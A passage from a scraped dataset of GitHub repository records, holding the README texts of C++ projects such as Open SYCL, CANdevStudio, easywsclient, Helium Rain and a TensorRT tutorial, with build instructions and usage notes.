* Enable OpenMP thread pinning (e.g. `OMP_PROC_BIND=true`). Open SYCL uses asynchronous worker threads for some light-weight tasks such as garbage collection, and these additional threads can interfere with kernel execution if OpenMP threads are not bound to cores.\n * Don't use `nd_range` parallel for unless you absolutely have to, as it is difficult to map efficiently to CPUs. \n * If you don't need barriers or local memory, use `parallel_for` with `range` argument.\n * If you need local memory or barriers, scoped parallelism or hierarchical parallelism models may perform better on CPU than `parallel_for` kernels using `nd_range` argument and should be preferred. Especially scoped parallelism also works well on GPUs.\n * If you *have* to use `nd_range parallel_for` with barriers on CPU, the `omp.accelerated` compilation flow will most likely provide substantially better performance than the `omp.library-only` compilation target. See the [documentation on compilation flows](doc/compilation.md) for details.\n\n#### Comparing against other LLVM-based compilers\n\nWhen targeting the CUDA or HIP backends, Open SYCL just massages the AST slightly to get `clang -x cuda` and `clang -x hip` to accept SYCL code. Open SYCL is not involved in the actual code generation. Therefore *any significant deviation in kernel performance compared to clang-compiled CUDA or clang-compiled HIP is unexpected.*\n\nAs a consequence, if you compare it to other llvm-based compilers please make sure to compile Open SYCL against the same llvm version. Otherwise you would effectively be simply comparing the performance of two different LLVM versions. This is in particular true when comparing it to clang CUDA or clang HIP.\n\n\n## Current state\nOpen SYCL is not yet a fully conformant SYCL implementation, although many SYCL programs already work with Open SYCL.\n* SYCL 2020 [feature support matrix](https://github.com/hipSYCL/featuresupport)\n* A (likely incomplete) list of [limitations](doc/limitations.md) for older SYCL 1.2.1 features\n* A (also incomplete) timeline showing development [history](doc/history.md)\n\n## Hardware and operating system support\n\nSupported hardware:\n* Any CPU for which a C++17 OpenMP compiler exists\n* NVIDIA CUDA GPUs. Note that clang, which Open SYCL relies on, may not always support the very latest CUDA version which may sometimes impact support for *very* new hardware. See the [clang documentation](https://www.llvm.org/docs/CompileCudaWithLLVM.html) for more details.\n* AMD GPUs that are [supported by ROCm](https://github.com/RadeonOpenCompute/ROCm#hardware-support)\n\nOperating system support currently strongly focuses on Linux. On Mac, only the CPU backend is expected to work. Windows support with CPU and CUDA backends is experimental, see [Using Open SYCL on Windows](https://github.com/illuhad/hipSYCL/wiki/Using-hipSYCL-on-Windows).\n\n## Installing and using Open SYCL\n* [Building & Installing](doc/installing.md)\n\nIn order to compile software with Open SYCL, use `syclcc` which automatically adds all required compiler arguments to the CUDA/HIP compiler. `syclcc` can be used like a regular compiler, i.e. you can use `syclcc -o test test.cpp` to compile your SYCL application called `test.cpp` with Open SYCL.\n\n`syclcc` accepts both command line arguments and environment variables to configure its behavior (e.g., to select the target platform CUDA/ROCm/CPU to compile for). See `syclcc --help` for a comprehensive list of options.\n\nWhen compiling with Open SYCL, you will need to specify the targets you wish to compile for using the `--hipsycl-targets=\"backend1:target1,target2,...;backend2:...\"` command line argument, `HIPSYCL_TARGETS` environment variable or cmake argument. See the documentation on [using Open SYCL](doc/using-hipsycl.md) for details.\n\nInstructions for using Open SYCL in CMake projects can also be found in the documentation on [using Open SYCL](doc/using-hipsycl.md).\n\n## Documentation\n* Open SYCL [design and architecture](doc/architecture.md)\n* Open SYCL runtime [specification](doc/runtime-spec.md)\n* Open SYCL [compilation model](doc/compilation.md)\n* How to use raw HIP/CUDA inside Open SYCL code to create [optimized code paths](doc/hip-source-interop.md)\n* A simple SYCL example code for testing purposes can be found [here](doc/examples.md).\n* [SYCL Extensions implemented in Open SYCL](doc/extensions.md)\n* [Macros used by Open SYCL](doc/macros.md)\n* [Environment variables supported by Open SYCL](doc/env_variables.md)\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kristjankorjus/Replicating-DeepMind", "link": "https://github.com/kristjankorjus/Replicating-DeepMind", "tags": [], "stars": 650, "description": "Reproducing the results of \"Playing Atari with Deep Reinforcement Learning\" by DeepMind", "lang": "C++", "repo_lang": "", "readme": "Replicating-DeepMind\n====================\n\nReproducing the results of \"Playing Atari with Deep Reinforcement Learning\" by DeepMind. All the information is in our [Wiki](https://github.com/kristjankorjus/Replicating-DeepMind/wiki).\n\n**Progress:** System is up and running on a GPU cluster with cuda-convnet2. It can learn to play better than random but not much better yet :) It is rather fast but still about 2x slower than DeepMind's original system. It does not have RMSprop implemented at the moment which is our next goal. \n\nNote 1: You can also check out a popular science article we wrote about the system to [Robohub](http://robohub.org/artificial-general-intelligence-that-plays-atari-video-games-how-did-deepmind-do-it/).\n\nNote 2: Nathan Sprague has a implementation based on Theano. It can do fairly well. See [his github](https://github.com/spragunr/deep_q_rl) for more details.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "strangergwenn/HeliumRain", "link": "https://github.com/strangergwenn/HeliumRain", "tags": [], "stars": 650, "description": "HELIUM RAIN / Full sources for Helium Rain, a realistic space opera using Unreal Engine 4", "lang": "C++", "repo_lang": "", "readme": "# Helium Rain source code\n\nHelium Rain is a realistic space opera for PC, now available on Steam.\n\n - [Website](http://helium-rain.com)\n - [Store page](https://store.steampowered.com/app/681330)\n\n![Game screenshot](http://helium-rain.com/gallery_data/blueheart.jpg)\n\n## About the game\n\nHelium Rain is a single-player space sim that places you at the helm of a spacefaring company. Exploration, trading, station-building, piracy are all options. Helium Rain relies on both spaceflight and strategy gameplay, mixed together in a creative way. Destroying a freighter has a direct impact on the economy, while declaring war will make your environment more hostile.\n\n - Realistic economy model with supply and demand\n - Strategy gameplay with procedural quests, world exploration, technology upgrades\n - 12 playable ships with weapon and engine upgrades\n - Fast-paced combat with a Newtonian flight model\n - Localized damage model for spacecrafts\n - Quick-play skirmish mode\n\n![Game screenshot](http://helium-rain.com/gallery_data/orbits.jpg)\n\n## Building Helium Rain from source\n\nWe provide these sources for our customers, and as a reference for Unreal Engine developers. **You won't be able to run the game from this repository alone**, as the game contents are not included. Building from source is only useful if you want to replace the game executable with your modifications.\n\nBuilding and modifying the source code for Helium Rain requires a few steps: getting the Unreal Engine 4 and other required tools, and building the game. We recommend you use the **release** branch of the game, but you can also keep the default **master** branch if you want to keep up with our changes.\n\n### Required dependencies\nYou will need the following tools to build Helium Rain from the sources:\n\n* Helium Rain uses UE4 as a game engine. You can get it for free at [unrealengine.com](http://unrealengine.com). You will need to sign up and download the Epic Games launcher. In the launcher library for Unreal Engine, install version 4.20.\n* [Visual Studio Community 2017](https://www.visualstudio.com/downloads/) will be used to build the sources. Don't forget to select the C++ development environment, since this is optional.\n* The [Windows 8.1 SDK](https://developer.microsoft.com/en-us/windows/downloads/windows-8-1-sdk) is required for Unreal Engine 4.\n* The [DirectX SDK](https://www.microsoft.com/en-us/download/details.aspx?id=6812) is required for the joystick plugin.\n* [CMake](https://cmake.org/download) is required for the joystick plugin. When prompted to add to the system PATH, please do it.\n* [TortoiseHg](https://tortoisehg.bitbucket.io/) is required for the joystick plugin.\n\n### Build process\nWe will now build the Helium Rain game executable. Follow these steps.\n\n* Open a Windows console (Windows + R ; \"cmd\" ; Enter).\n* Navigate to the *Plugins\\JoystickPlugin\\ThirdParty\\SDL2 folder* in the Helium Rain archive.\n* Run setup.bat and wait for it to complete without errors.\n* Run build.bat and wait for it to complete without errors.\n* In the Windows explorer, right-click HeliumRain.uproject and pick \"Generate Visual Studio Project Files\".\n* A HeliumRain.sln file will appear - double-click it to open Visual Studio.\n* Select the \"Shipping\" build type.\n* You can now build Helium Rain by hitting F7 or using the Build menu. This should take from 5 to 10 minutes.\n\nThe resulting binary will be generated as *Binaries\\Win64\\HeliumRain-Win64-Shipping.exe* and can replace the equivalent file in your existing game folder.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "GENIVI/CANdevStudio", "link": "https://github.com/GENIVI/CANdevStudio", "tags": ["automotive", "can", "can-bus", "genivi"], "stars": 651, "description": "Development tool for CAN bus simulation", "lang": "C++", "repo_lang": "", "readme": "# CANdevStudio \n[![CANdevStudio](https://github.com/GENIVI/CANdevStudio/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/GENIVI/CANdevStudio/actions/workflows/build.yml?query=branch%3Amaster++) [![codecov](https://codecov.io/gh/GENIVI/CANdevStudio/branch/master/graph/badge.svg)](https://codecov.io/gh/GENIVI/CANdevStudio) [![Doxygen](https://img.shields.io/badge/Doxygen-master-blue.svg)](https://genivi.github.io/CANdevStudio/)\n\n\n\n* [Overview](#overview)\n * [Compatible CAN interfaces](#compatible-can-interfaces)\n * [Supported operating systems](#supported-operating-systems)\n* [Build instructions](#build-instructions)\n * [Linux](#linux)\n * [To choose compiler](#to-choose-compiler)\n * [Qt in CMake](#qt-in-cmake)\n * [Windows](#windows)\n * [Visual Studio 2019 Win64](#visual-studio-2019-win64)\n * [macOS / OS X](#macos--os-x)\n* [Prebuilt packages](#prebuilt-packages)\n * [Download](#download)\n * [Package naming](#package-naming)\n * [Linux](#linux-1)\n * [ARCH Linux](#arch-linux)\n * [Windows](#windows-1)\n * [macOS / OS X](#macos--os-x-1)\n* [Quick Start](#quick-start)\n * [CAN Hardware](#can-hardware)\n * [Microchip CAN BUS Analyzer](#microchip-can-bus-analyzer)\n * [Lawicel CANUSB](#lawicel-canusb)\n * [PeakCAN PCAN-USB](#peakcan-pcan-usb)\n * [PassThruCAN Plugin](#passthrucan-plugin)\n * [CANdevStudio without CAN hardware](#candevstudio-without-can-hardware)\n * [VCAN](#vcan)\n * [Cannelloni](#cannelloni)\n* [Help](#help)\n * [Scripting](#scripting)\n * [CAN Signals](#can-signals)\n * [CanDevice configuration](#candevice-configuration)\n * [CanRawFilter](#canrawfilter)\n * [Adding new components](#adding-new-components)\n \n## Overview\nMost of automotive projects need to have an access to the Controller Area Network (CAN) bus. There are plenty of commercial frameworks that provides CAN stacks and hardware/software tools necessary to develop proper CAN networks. They are very comprehensive and thus expensive. CANdevStudio aims to be cost-effective replacement for CAN simulation software. It can work with variety of CAN hardware interfaces (e.g. Microchip, Vector, PEAK-Systems) or even without it (vcan and [cannelloni](https://github.com/mguentner/cannelloni)) . CANdevStudio enables to simulate CAN signals such as ignition status, doors status or reverse gear by every automotive developer. Thanks to modularity it is easy to implement new, custom features.\n\nCheckout CANdevStudio on [YouTube](https://www.youtube.com/watch?v=1TfAyg6DG04)\n\n

\n\n

\n\n### Compatible CAN interfaces\nAccess to CAN bus is based on Qt framework. Current list of supported CAN interfaces can be found [here](https://doc.qt.io/qt-5/qtcanbus-backends.html).\n\nCurrent list of devices compatible with SocketCAN (Linux only) can be found [here](http://elinux.org/CAN_Bus).\n### Supported operating systems\n* Linux\n* Windows\n* macOS\n\n## Build instructions\nCANdevStudio project uses GitHub Actions as continuous integration environment. You can check [build.yml](https://github.com/GENIVI/CANdevStudio/blob/master/.github/workflows/build.yml) for details. \n\nTo lower maintenance effort and allow for usage of modern C++ features, since v1.2.0 CANdevStudio dropped \"official\" support for legacy compilers like gcc5.3, vs2015 or MinGW. Current CI configuration uses the latest compilers available for each GitHub Actions environment:\n* ubuntu-latest (clang and gcc)\n* macos-latest (clang)\n* windows-latest (vs2019 x64)\n\n### Linux\n```\ngit clone https://github.com/GENIVI/CANdevStudio.git\ncd CANdevStudio\ngit submodule update --init --recursive\nmkdir build\ncd build\ncmake ..\nmake\n```\n#### To choose compiler\n```\ncd CANdevStudio/build\nrm -rf *\nexport CC=clang\nexport CXX=clang++\ncmake ..\nmake\n```\n#### Qt in CMake\nIf CMake failed to find Qt in your system:\n```\ncd CANdevStudio/build\nrm -rf *\ncmake .. -DCMAKE_PREFIX_PATH=/home/genivi/Qt5.12.0/5.12.0/gcc_64\nmake\n```\n### Windows\n#### Visual Studio 2019 Win64\n```\ngit clone https://github.com/GENIVI/CANdevStudio.git\ncd CANdevStudio\ngit submodule update --init --recursive\nmkdir build\ncd build\ncmake .. -DCMAKE_BUILD_TYPE=Release -G \"Visual Studio 16 2019\" -A x64\ncmake --build .\n```\n### macOS / OS X\n```\ngit clone https://github.com/GENIVI/CANdevStudio.git\ncd CANdevStudio\ngit submodule update --init --recursive\nmkdir build\ncd build\ncmake .. -GNinja -DCMAKE_PREFIX_PATH=/path/to/Qt/lib/cmake\nninja\n```\n## Prebuilt packages\nEach GitHub Actions job stores prebuilt packages for 90 days. Additionally official releases are stored on GitHub Releases page.\n### Package naming\n***CANdevStudio-X.Y.ZZZZZZZ-SYS[-standalone]***\n\n**X** - major version number of previous stable version
\n**Y** - minor version of previous stable version
\n**Z** - SHA commit ID
\n**SYS** - either **win64**, **Linux** or **Darwin**
\n**standalone** - bundle version that contains Qt libraries and all relevant plugins.
\n### Linux\nAll packages are being built on ubuntu-latest environment. Refer to [this](https://github.com/actions/virtual-environments) page to determine the exact Ubuntu version. You may experience problems with missing or incompatible libraries when trying to run the package on other distros. \n\nTo run standalone version use CANdevStudio.sh script.\n### ARCH Linux\nInstall AUR package: [candevstudio-git](https://aur.archlinux.org/packages/candevstudio-git/)\n\n### Windows\nPackages built with Visual Studio 2019.\n\nStandalone version contains Qt. Installation of VS2019 redist packages may be still required. \n### macOS / OS X\nPackage is a DMG installer.\n## Quick Start\nGeneral instructions to start your first simulation:\n1. Build the latest master or release.\n2. Run the application and start a new project\n3. Drag and drop CanDevice and CanRawView components and connect them accordingly.\n4. Double click on CanDevice node to open configuration window.\n 1. set one of supported backends (e.g. socketcan) [link](http://doc.qt.io/qt-5.10/qtcanbus-backends.html).
**NOTE:** List of supported backends depends on Qt version.\n 2. set name of your can interface (e.g. can0)\n5. Start the simulation\n6. Double click on CanRawView component to see CAN traffic\n\nSteps required to use specific CAN hardware or virtual interfaces require some additional steps listed in following sections.\n### CAN Hardware\nThe list below shows hardware that has been successfully used with CANdevStudio.\n#### Microchip CAN BUS Analyzer\n* Tested on Linux\n* Requires socketcan [driver](https://github.com/rkollataj/mcba_usb).\n* Officially supported in Linux Kernel v4.12+\nConfiguration:\n1. Find your interface name (e.g. can0)
\n```ip link```\n2. Configure bitrate
\n```sudo ip link set can0 type can bitrate 1000000```\n3. Bring the device up
\n```sudo ip link set can0 up```\n4. Optionally configure CAN termination\n 1. In GitHUB based driver
\n ```sudo ip link set can0 type can termination 1```\n 2. In Linux 4.12+ driver
\n ```sudo ip link set can0 type can termination 120```\n\nCanDevice backend: socketcan\n\n#### Lawicel CANUSB\n* Tested on Linux\n* Based on FTDI Serial driver\n* Requires slcand to \"convert\" serial device to SocketCAN.\n* Officially supported in Linux Kernel v2.6.38\n\nConfiguration:\n1. Create SocketCAN device from serial interface
\n```sudo slcand -o -c -s8 -S1000000 /dev/ttyUSB0 can0```\n2. Bring the device up
\n```sudo ip link set can0 up```\n\nCanDevice backend: socketcan\n\n#### PeakCAN PCAN-USB\n* Tested on Windows\n\nCanDevice settings example:\n```\nbackend: peakcan\ninterface: usb0\nconfiguration: BitRateKey = 250000\n```\n#### PassThruCAN Plugin\n* Tested on Windows\n\nCanDevice settings example for PEAK-PCAN:\n```\nbackend: passthrucan\nconfiguration: BitRateKey = 250000\ninterface: PCANPT32\n```\nCanDevice settings example for SIE_CANUSB:\n```\nbackend: passthrucan\nconfiguration: BitRateKey = 250000\ninterface: CANUSB\n```\nCanDevice settings example for Kvaser USBcan:\n```\nbackend: passthrucan\nconfiguration: BitRateKey = 250000\ninterface: J2534 (kline) for Kvaser Hardware\n```\n### CANdevStudio without CAN hardware\nCANdevStudio can be used without actual CAN hardware thanks to Linux's built-in emulation.\n#### VCAN\nConfiguration:\n```\nsudo modprobe vcan\nsudo ip link add dev can0 type vcan\nsudo ip link set can0 up\n```\nCanDevice backend: socketcan\n#### Cannelloni\nA SocketCAN over Ethernet tunnel. Available for Linux only.\n\nLet's consider setup as before:\n

\n\n

\n\n##### Configuration with qtCannelloniCanBusPlugin\nTarget configuration:\n```\nsudo modprobe vcan\nsudo ip link add dev can0 type vcan\nsudo ip link set can0 up\ncannelloni -I can0 -R 192.168.0.1 -r 30000 -l 20000\n```\nPC configuration:\n\n1. Install libqtCannelloniCanBusPlugin.so that is built along with CANdevStudio. You can either copy it manually to Qt plugins directory (e.g. /usr/lib/qt/plugins/canbus) or use \"make install\" to do it automatically.\n2. Create new project in CANdevStudio and add CanDevice node\n3. Configure CanDevice:\n 1. backend: cannelloni\n 2. interface: 30000,192.168.0.2,20000 (local_port,remote_ip,remote_port)\n4. Start simulation\n\n##### Configuration without qtCannelloniCanBusPlugin\nTarget configuration:\n```\nsudo modprobe vcan\nsudo ip link add dev can0 type vcan\nsudo ip link set can0 up\ncannelloni -I can0 -R 192.168.0.1 -r 30000 -l 20000\n```\nPC configuration:\n1. Execute following lines in a shell\n```\nsudo modprobe vcan\nsudo ip link add dev can0 type vcan\nsudo ip link set can0 up\ncannelloni -I can0 -R 192.168.0.2 -r 20000 -l 30000\n```\n2. Create new project in CANdevStudio and add CanDevice node\n3. Configure CanDevice:\n 1. backend: socketcan\n 2. interface: can0\n4. Start simulation\n\n## Help\n### Scripting\nAs of v1.1 CANdevStudio supports creation of [QML](https://doc.qt.io/qt-5/qmlapplications.html) based scripts. Scripts can be developed and loaded dynamically without a need to restart the main applications. Scripting adds a lot of different possibilities to CANdevStudio that includes:\n* Creation of custom GUIs\n* Raw frames and signals handling\n* Time triggered actions\n* Message triggered actions\n* ... and many more, as all QML functionalities are supported.\n\nTry it yourself by loading one of the [examples](https://github.com/GENIVI/CANdevStudio/tree/master/src/components/qmlexecutor/examples) into QMLExecutor component. You are welcome to share your scripts via Pull Requests!\n\n### CAN Signals\nCANdevStudio provides support for CAN signals handling. [DBC](http://socialledge.com/sjsu/index.php/DBC_Format) database description format is supported. Reverse engineered DBC files can be found in [opendbc](https://github.com/commaai/opendbc) project.\n\nSupport for others CAN database formats can be added via extension of [CANdb](https://www.github.com/GENIVI/CANdb).\n\n#### Sending signals\n1. Start new project and setup CanDevice as described in quick start section\n2. **Add CanSignalData** component that serves as CAN signals database for other components. You may have multiple CanSignalData components per projecthttps://github.com/commaai/opendbc\n3. Open CanSignalData properties and configure path to DBC file\n4. List of messages and signals shall be now loaded and visible in CanSignalData window\n5. You may configure cycle and initial value per each message\n6. **Add CanSignalEncoder** component and connect it with CanDevice. CanSignalEncoder act as a translator between signals and CAN frames. It is also responsible for sending cyclical messages.\n7. CanSignalSender has been automatically configured to use previously added CAN database. CAN database can be manually selected in component properties (this applies to all components from \"Signals\" group)\n8. **Add CanSignalSender** component and connect it with CanSignalEncoder\n9. Add signals in CanSignalSender window\n10. Start simulation\n11. CanSignalEncoder will start sending cyclical messages\n12. You can send previously configured signals from CanSignalSender:\n * if signal is a part of periodic message its value will be updated in a next cycle\n * if signal is not a part of periodic message it will be sent out immediately\n\n#### Receiving signals\n1. Start new project and setup CanDevice as described in quick start section\n2. **Add CanSignalData** component that serves as CAN signals database for other components. You may have multiple CanSignalData components per project\n3. Open CanSignalData properties and configure path to DBC file\n4. List of messages and signals shall be now loaded and visible in CanSignalData window\n5. **Add CanSignalDecoder** component and connect it with CanDevice. CanSignalDecoder act as a translator between signals and CAN frames.\n6. CanSignalDecoder has been automatically configured to use previously added CAN database. CAN database can be manually selected in component properties (this applies to all components from \"Signals\" group)\n7. **Add CanSignalViewer** component and connect it with CanSignalDecoder\n8. Start simulation\n9. Signals shall now appear in CanSignalViewer. Note that CanSignalDecoder is sending over only signals which values has changed.\n\n### CanDevice configuration\nCanDevice component can be configured using \"configuration\" property:\n* Format - \"key1=value1;key2=value2;keyX=valueX\"\n* Keys names are case sensitive, values are case insensitive\n* Configuration keys are taken from [ConfigurationKey enum](https://doc.qt.io/qt-5/qcanbusdevice.html#ConfigurationKey-enum). \n* RawFilterKey and ErrorFilterKey are currently not supported\n* Whitespaces are ignored\n\nE.g.\n```\nBitRateKey=100000;ReceiveOwnKey=false;LoopbackKey=true\n```\n### CanRawFilter\nCanRawFilter component enables to filter (i.e. accept or drop) incoming and outgoing frames:\n* [Qt](https://doc.qt.io/qt-5/qregularexpression.html) regular expressions are used to match filter rules.\n* Rules are matched from top to bottom\n* Default policy is applied to frames unmatched by any filter\n\nExamples:\n* match 0x222 and 0x333 frames only [id field]\n```\n222|333\n```\n* match 0x200 - 0x300 frames only [id field]\n```\n^[23]..$\n```\n* match empty payload (DLC 0) [payload field]\n```\n^$\n```\n* match 2 byte payload (DLC 2) [payload field]\n```\n^.{4}$\n```\n### Adding new components\n1. Configure build to include *templategen* tool\n```\ncd build\ncmake .. -DWITH_TOOLS=ON\nmake\n```\n2. Generate component (use -g option if you don't need component to have GUI)\n```\n./tools/templategen/templategen -n MyNewComponent -o ../src/components -g\n```\n3. CMake script automatically detects new components. It has to be invoked manually.\n```\ncmake ..\n```\n4. Build project \n``` \nmake\n```\n5. Your component is now integrated with CANdevStudio\n6. You may want to modify *src/components/mynewcomponent/mynewcomponentplugin.h* to configure section name, color and spacing\n7. Define component inputs and outputs in *src/components/mynewcomponent/mynewcomponentmodel.cpp*. Look for examples in other components.\n8. Modify automatically generated unit tests *src/components/mynewcomponent/tests*\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ESPresense/ESPresense", "link": "https://github.com/ESPresense/ESPresense", "tags": ["esp32", "esp32-arduino", "mqtt", "home-assistant", "homeassistant", "home-automation", "iot", "hacktoberfest", "m5stickc", "m5atom", "m5atom-lite", "m5atom-matrix", "m5stickcplus", "indoor-positioning"], "stars": 650, "description": "An ESP32 based presence detection node for use with the Home Assistant mqtt_room component for localized device presence detection.", "lang": "C++", "repo_lang": "", "readme": "# ESPresense\n\n![GitHub release (latest by date)](https://img.shields.io/github/v/release/ESPresense/ESPresense)\n![GitHub all releases](https://img.shields.io/github/downloads/ESPresense/ESPresense/total)\n[![.github/workflows/main.yml](https://github.com/ESPresense/ESPresense/actions/workflows/build.yml/badge.svg)](https://github.com/ESPresense/ESPresense/actions/workflows/build.yml)\n\n\nAn ESP32 based presence detection node for use with the [Home Assistant](https://www.home-assistant.io/) [`mqtt_room` component](https://www.home-assistant.io/components/sensor.mqtt_room/) for localized device presence detection.\n\n**Documentation:** https://espresense.com/\n\n**Building:** [building](./BUILDING.md).\n\n**Release Notes:** [changelog](./CHANGELOG.md).\n", "readme_type": "markdown", "hn_comments": "Development environments, Arduino compatible bare metal, NuttX and CircuitPython.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dhbaird/easywsclient", "link": "https://github.com/dhbaird/easywsclient", "tags": [], "stars": 649, "description": "A short and sweet WebSocket client for C++", "lang": "C++", "repo_lang": "", "readme": "easywsclient\n============\n\nEasywsclient is an easy and powerful WebSocket client to get your\nC++ code connected to a web stack right away. It depends only on the\nstandard libraries. It is compatible with modern C++11 std::function and\n[lambda](http://en.wikipedia.org/wiki/Anonymous_function#C.2B.2B),\nif they're available (it's not required though). [RFC\n6455](http://tools.ietf.org/html/rfc6455) Version 13 WebSocket is\nsupported. Version 13 is compatible with all major, modern WebSocket\nimplementations, including Node.js, and has been a standard since\nDecember 2011.\n\nRationale: This library is intended to help a C++ project start using\nWebSocket rapidly. This small library can easily be thrown into an\nexisting project. For complicated builds that you can't figure out right\naway, you can even cheat by piggy-backing the .cpp file into one of\nthe project's existing files. Yes, WebSocket is that awesome enough to\nwarrant getting it integrated into your project! This project imposes\nno special interface requirements, and can work happily with new C++11\nfeatures or with older C++ projects.\n\nAs an additional benefit, easywsclient is very simple, with just a single\nimplementation file. It can serve as a cruft-free concise reference. You\nare most welcome to use this code as a reference for creating alternative\nimplementations that may better suit your needs.\n\nNews\n====\n\n*2014-12-06*\nBinary frames now supported. Closes issue #38. Automated integration testing\nis now supported by running `make test`. The test suite expects GoogleTest to\nbe installed at `/usr/src/gtest` (`apt-get install libgtest-dev` does the\ntrick). The test suite uses C++14 (for lambda capture expressions), and thus it\nwill not work on older compilers. Note that easywsclient itself still\nrestricted to C++98/C++03, and will continue to build with older compilers.\n\n\n\nUsage\n=====\n\nThe WebSocket class interface looks like this:\n\n```c++\n// Factory method to create a WebSocket:\nstatic pointer from_url(std::string url);\n// Factory method to create a dummy WebSocket (all operations are noop):\nstatic pointer create_dummy();\n\n// Function to perform actual network send()/recv() I/O:\n// (note: if all you need is to recv()/dispatch() messages, then a\n// negative timeout can be used to block until a message arrives.\n// By default, when timeout is 0, poll() will not block at all.)\nvoid poll(int timeout = 0); // timeout in milliseconds\n\n// Receive a message, and pass it to callable(). Really, this just looks at\n// a buffer (filled up by poll()) and decodes any messages in the buffer.\n// Callable must have signature: void(const std::string & message).\n// Should work with C functions, C++ functors, and C++11 std::function and\n// lambda:\ntemplate\nvoid dispatch(Callable callable);\n\n// Sends a TEXT type message (gets put into a buffer for poll() to send\n// later):\nvoid send(std::string message);\n\n// Close the WebSocket (send a CLOSE message over WebSocket, then close() the\n// actual socket when the send buffer becomes empty):\nvoid close();\n```\n\nPut together, the usage looks like this:\n\n```c++\n#include \"easywsclient.hpp\"\n//#include \"easywsclient.cpp\" // <-- include only if you don't want compile separately\n\nint\nmain()\n{\n ...\n using easywsclient::WebSocket;\n WebSocket::pointer ws = WebSocket::from_url(\"ws://localhost:8126/foo\");\n assert(ws);\n while (true) {\n ws->poll();\n ws->send(\"hello\");\n ws->dispatch(handle_message);\n // ...do more stuff...\n }\n ...\n delete ws; // alternatively, use unique_ptr<> if you have C++11\n return 0;\n}\n```\n\nExample\n=======\n\n # Launch a test server:\n node example-server.js\n\n # Build and launch the client:\n g++ -c easywsclient.cpp -o easywsclient.o\n g++ -c example-client.cpp -o example-client.o\n g++ example-client.o easywsclient.o -o example-client\n ./example-client\n\n # ...or build and launch a C++11 client:\n g++ -std=gnu++0x -c easywsclient.cpp -o easywsclient.o\n g++ -std=gnu++0x -c example-client-cpp11.cpp -o example-client-cpp11.o\n g++ example-client-cpp11.o easywsclient.o -o example-client-cpp11\n ./example-client-cpp11\n\n # Expect the output from example-client:\n Connected to: ws://localhost:8126/foo\n >>> galaxy\n >>> world\n\nThreading\n=========\n\nThis library is not thread safe. The user must take care to use locks if\naccessing an instance of `WebSocket` from multiple threads. If you need\na quick threading library and don't have Boost or something else already,\nI recommend [TinyThread++](http://tinythreadpp.bitsnbites.eu/).\n\nFuture Work\n===========\n\n(contributions appreciated!)\n\n* Parameterize the `pointer` type (especially for `shared_ptr`).\n* Support optional integration on top of an async (event-driven) library,\n especially Asio.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "LitLeo/TensorRT_Tutorial", "link": "https://github.com/LitLeo/TensorRT_Tutorial", "tags": [], "stars": 649, "description": null, "lang": "C++", "repo_lang": "", "readme": "# It is recommended to watch the latest video version! The list is as follows\n - [\"TensorRT Tutorial (1) How to choose the TensorRT version\"][21]\n - [\"TensorRT Tutorial (2) Compile TensorRT's open source source code\"][22]\n - [\"TensorRT Tutorial (3.1) Explains TensorRT Documentation - Basic Use\"][23]\n - [\"TensorRT Tutorial (3.2) Explains TensorRT Documentation - Code Samples TRT Can Use for Reference\"][24]\n - [\"TensorRT Tutorial (3.3.1) plugin examples and principles\"][25]\n - [\"TensorRT Tutorial (3.3.2) How to Build Your Own Plugin Library\"][26]\n - [\"TensorRT plugin 16 Acceleration Experience\"][27]\n\n - For the video version information, see the catalog-video version information\n\n## progress log\n - 2017-04-27 The project was initiated and the GitHub warehouse was created.\n - 2017-09-30 TensorRT 3 was released recently, let's sort out the current resources.\n - 2017-10-18 Added blog - use TensorRT to implement leaky relu layer\n - 2017-11-11 Resources: Added google's INT8 open source library\n - 2017-11-25 Add a blog-Introduction to the usage of TensorRT Plugin-take the leaky relu layer as an example\n - 2020-8-31 Add blog \"Introduction to TensorRT Github Open Source Part\"\n - 2020-9-7 Add a blog \"Summary of TensorRT Can Learn from Code\"\n - 2022-11-2 Added blog \"Comprehensive Summary of Conformer Encoder GPU Acceleration Strategies\"\n - 2022-11-2 Add blog \"Comparison of Several Ways of TensorRT Conversion Model\"\n\n----\n\n## Resource organization\n - [TensorRT 3 RC][1] and [TensorRT 2.1][2] download link\n - [TensorRT 2.1 Official Online Documentation][3]\n - NVIDIA introduces TensorRT's blog-[Deploying Deep Neural Networks with NVIDIA TensorRT][4]\n - GTC 2017 introduced TensorRT's [PPT][5] and [Video][6], including the implementation principles of INT8 Quantization and Calibration.\n - Add INT8 [demo][7] of cublas and cudnn\n - Added my PPT on the topic of NVIDIA INT8 at GTC China 2017 Community Corner, [GTC-China-2017-NVIDIA-INT8.pdf][8]\n - Added google's INT8 open source library [gemmlowp][9], currently supports ARM and CPU optimization\n - The \"TensorRT Series\" blog written by the \"ZizhizhiGPGPU\" public account, published by NVIDIA engineers, from the introductory article to the INT8 article to the FP16 article and finally to the Custom Layer article, the content is logical and full of dry goods. Ashamed. Attached are four blog links: [Introduction to TensorRT series][10], [INT8 of TensorRT series][11], [FP16 of TensorRT series][12], [Custom Layer of TensorRT series][13] .\n - [\"Practical combat of high-performance deep learning support engine - TensorRT\"][14], main content: 1. Introduction to TensorRT theory: basic introduction to what TensorRT is; what optimizations have been made; why is TensorRT needed on the basis of the framework optimization engine. 2. TensorRT high-level introduction: For advanced users, how to deal with network layers that are not supported by TensorRT;\n\n---\n## blog\n - [Using TensorRT to implement leaky relu layer][15]\n - [Introduction to the usage of TensorRT Plugin - taking the leaky relu layer as an example][16]\n\n#TensorRT_Tutorial\n\nAs a c++ library launched by NVIDIA, TensorRT can realize high-performance inference (inference) process. Recently, NVIDIA released the TensorRT 2.0 Early Access version. The major change is to support the INT8 type. In today's era when DL is popular, INT8 has great advantages in reducing the size of the model and speeding up the operation. Google's newly released TPU uses an 8-bit data type.\n\nI am currently using TensorRT to explore INT8. I have been pitted once by the imperfect documentation of TensorRT. So I want to do a TensorRT 